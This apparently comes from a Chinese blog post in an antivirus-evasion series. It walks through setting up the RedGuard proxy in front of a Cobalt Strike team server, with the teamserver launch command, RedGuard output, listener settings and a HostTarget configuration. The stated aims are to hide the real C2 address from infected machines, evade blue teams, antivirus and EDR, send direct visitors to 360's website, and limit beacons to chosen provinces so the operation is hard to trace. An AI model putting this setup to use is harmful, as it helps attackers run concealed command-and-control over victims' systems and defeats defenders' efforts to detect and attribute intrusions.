免杀之CS前置隐匿

一. 工具地址:

1
https://github.com/wikiZ/RedGuard/

二. 工具介绍:

三. 工具的使用:

3.1 运行服务端的cs

1
2
──(root㉿kali)
└─# ./teamserver 192.168.144.128  admin123 jquery-c2.4.5-jx.profile

3.2 RedGuard_64 运行

反向代理服务器上, 也就是RedGuard运行的机器, 运行RedGuard(第一次运行会生成配置文件, 再次运行RedGuard_64)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
root@derian-pc:~/demo# chmod +x RedGuard_64
root@derian-pc:~/demo# ./RedGuard_64 
	
██████╗ ███████╗██████╗    ██████╗ ██╗   ██╗ █████╗ ██████╗ ██████╗ 
██╔══██╗██╔════╝██╔══██╗  ██╔════╝ ██║   ██║██╔══██╗██╔══██╗██╔══██╗
██████╔╝█████╗  ██║  ██║  ██║  ███╗██║   ██║███████║██████╔╝██║  ██║
██╔══██╗██╔══╝  ██║  ██║  ██║   ██║██║   ██║██╔══██║██╔══██╗██║  ██║
██║  ██║███████╗██████╔╝  ╚██████╔╝╚██████╔╝██║  ██║██║  ██║██████╔╝  -V 23.08.21 Alpha
╚═╝  ╚═╝╚══════╝╚═════╝    ╚═════╝  ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝╚═════╝ 

Github:https://github.com/wikiZ/RedGuard

RedGuard is a C2 front flow control tool,Can avoid Blue Teams,AVs,EDRs check.

[2025-06-22 10:55:08] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://127.0.0.1:4433"}
[2025-06-22 10:55:08] Proxy Listen Port :80 (HTTP)
[2025-06-22 10:55:08] Proxy Listen Port :443 (HTTPS)

3.3 打开客户端创建监听器 (HTTPS 和 HTTP是一样的)

1
2
3
4
HTTP 地址和HTTP 地址(Stager)都填写反向代理服务器的ip(RedGuard_64)
HTTP端口(上线)填写反向代理服务监听的端口
HTTP端口(监听)填写Beacons与C2服务器通信的端口
HTTP Host头 填写反向代理中设置的host头

3.4 然后保存监听器

修改配置文件 .RedGuard_CobaltStrike.ini (热加载,修改及生效!)

1
2
HostTarget = {"360.net":"http://192.168.144.189:80","360.com":"https://192.168.144.189:4433"}
# http://192.168.144.189:80 为beacon的通信地址, cs服务端监听的地址

成功上线:

流量走向:

当受害者机器运行样本之后, 访问反向代理服务器的地址 http://192.168.144.189:80, 然后反向代理服务器根据配置文件转发到http://192.168.144.128:8080 cs服务端和beacon的通信地址, 然后上线cs

这样有什么好处?

隐藏真正cs服务端的真实ip地址, 样本所在机器的通信流量只有反向代理服务器的

1
2
netstat -ano|findstr 192.168.144.128    //查不到cs服务器的IP
netstat -ano|findstr 192.168.144.189    //只能查到CS代理的IP

在加上我们配置了host头, 直接访问, 会跳转到360官网,溯源就不好进行了

补充:

公网的话需要进行安全组的释放!!!

关于更多RedGuard用法:

https://github.com/wikiZ/RedGuard/blob/main/doc/README_CN.md

省份(可以限制cs服务器只能连接国内的机器)

1
2
黑龙江,吉林,辽宁,河北,山西,陕西,甘肃,四川,贵州,云南,浙江,江苏,山东,安徽,江西,福建,河南,湖北,湖南,广
东,海南,台湾,青海,内蒙古,广西,西藏,宁夏,新疆维吾尔,北京,上海,天津,重庆,香港,澳门

总结:通过RedGuard工具,可以达到CS服务器的地址隐藏的效果。难以进行溯源

免杀系列
#免杀
免杀之CS前置隐匿
http://example.com/2025/06/21/免杀之CS前置隐匿/
作者
XCDH
发布于
2025年6月21日
许可协议